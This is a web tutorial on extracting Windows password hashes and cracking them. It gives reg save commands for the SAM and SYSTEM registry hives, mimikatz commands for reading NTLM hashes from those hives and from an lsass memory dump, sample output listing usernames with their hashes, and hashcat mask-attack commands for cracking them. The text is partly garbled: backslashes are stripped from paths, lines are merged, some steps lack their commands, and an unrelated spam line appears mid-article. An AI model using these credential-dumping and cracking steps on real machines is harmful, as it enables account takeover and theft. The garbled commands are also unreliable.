In this article, we will find out where the user password is stored in Windows, how to extract data for cracking the Windows password, how to hack user password and what is Pass the hash attack.
Not everyone uses a password on Windows – it is especially rare for users to set a password on a home computer that only one person works on. But in a corporate network or when using Windows as a server, a password is required. Another interesting property of a Windows user password: if a user has an online Microsoft account, the password hash is still stored on the local computer, and the decrypted password can be used to log in for both the local computer and Microsoft online services.
Where does Windows store user login password?
Windows user passwords are stored in the hives of the Windows registry called SYSTEM and SAM in the files:
Instead of a plain text password, Windows stores password hashes. These hashes can be brute-forced easily. But even without cracking, Windows password hashes can be used to collect data and carry out attacks.
How to get Windows password hashes
Dump Windows password hashes on a running computer
On a running system, it is problematic to access the C:/Windows/System32/config/SAM and C:/Windows/System32/config/SYSTEM files, although this is possible. To save copies of these files, you can use the reg utility:
reg save HKLMSYSTEM SystemBkup.hivreg save HKLMSAM SamBkup.hivIn some tutorials, instead of SYSTEM, the SECURITY hive is saved – this is a mistake, you cannot restore the hash with the SECURITY and SAM hives, we just need SYSTEM and SAM!
The password hash is also contained in RAM, namely in the Local Security Authority Process (lsass.exe). This process is always launched in running Windows and you can dump it (a copy of the process in RAM is saved to disk as a file). You can use various utilities to create a dump, including two official ones:
There is already a task manager on every Windows, to open it press Win+r and type taskmgr, then press ENTER. Or, right-click on the taskbar (that is, on the bottom bar where the clock, start button, etc.) are located and select “Task Manager” in the context menu.
Wait for completion:
The output is quite extensive and there is a lot of data. Of interest are sequential lines of the form:
User : USERNAME Hash NTLM: HASHIn my example, interesting lines:
User : ShareOverlord Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6User : Alexey Hash NTLM: ca76a176340f0291e1cc8ea7277fc571There are also lines with usernames:
User : MiAlUser : АдминистраторBut after them there are no strings with the NTLM hash, because these users do not have a password in the system.
Xem thêm: Windows Xp Desktop Backgrounds
If you want to extract data from the registry files of the current operating system, then exit mimikatz, for this press Ctrl+c.
Now we will dump the SYSTEM and SAM registry hives of the current system:
reg save HKLMSYSTEM SystemBkup.hivreg save HKLMSAM SamBkup.hivRun mimikatz again:
.mimikatz.exeTurn on logging:
log hash-local.txtAnd we execute a command indicating the files into which dumps of the registry hives are saved, that is, SystemBkup.hiv and SamBkup.hiv:
lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hivOutput Example:
Only one user with a hash was found here:
User : Администратор Hash NTLM: 5187b179ba87f3ad85fea3ed718e961fIn fact, to extract NTLM hashes from the local system, it was not necessary to dump the registry hives. Another option is to increase the privileges of the mimikatz program itself and extract hashes directly from the system. To do this, run the commands:
How to extract NTLM hash from lsass.DMP file
Logically (and in practice) in the dump of the Local Security Authority Process should only be the hash of the user who logged in with a password.
First, specify the path to the dump file with a command of the form:
sekurlsa::minidump C:path olsass.DMPFor instance:
sekurlsa::minidump C:Share-Serverfileslsass.DMPThen run the command:
How to brute-force NTLM hash
For hacking I will take the following hash:
User : Alexey Hash NTLM: ca76a176340f0291e1cc8ea7277fc571Take a look at the Hashcat help to find out the NTLM hash mode number:
1000 | NTLM | Operating SystemsThat is, the NTLM hash number is 1000(hashcat mode).
To launch a mask attack to crack NTLM in Hashcat, you need to run a command of the form:
hashcat -m 1000 -a 3 'HASH' MASKAn example of my real command:
hashcat –force –hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i –increment-min 1 –increment-max 10 -1 ?l?d ca76a176340f0291e1cc8ea7277fc571 ?1?1?1?1?1?1?1?1?1In this command:
hashcat is the name of the executable file. On Windows, it could be hashcat64.exe.
–force means ignore warnings–hwmon-temp-abort=100 means setting the maximum temperature, after which the brute-force attck will be interrupted, by 100 degrees Celsius-m 1000 means NTLM hash type-D 1,2 means to use both the central processor and the video card for brute-force-a 3 means mask attack-i means gradually increase the number of characters in the generated passwords–increment-min 1 means start with mask length equal to one–increment-max 10 means to end the search with a mask length of ten-1 ?l?d means custom character set number 1, it includes small Latin letters (?l) and numbers (?d)ca76a176340f0291e1cc8ea7277fc571 is the hash for hacking?1?1?1?1?1?1?1?1?1 is a mask from a custom character set
Let's hack one more hash:
User : Администратор Hash NTLM: 5187b179ba87f3ad85fea3ed718e961fCommand (another hash and another set of custom characters):
hashcat –force –hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i –increment-min 1 –increment-max 10 -1 ?l?u?d 5187b179ba87f3ad85fea3ed718e961f ?1?1?1?1?1?1?1?1?1
So, in this article, we learned how to extract an NTLM hash and crack a Windows password. But what if you fail to crack NTLM? See the second part, entitled “Pass-the-hash attack (how to use NTLM without cracking a password)” for the answer.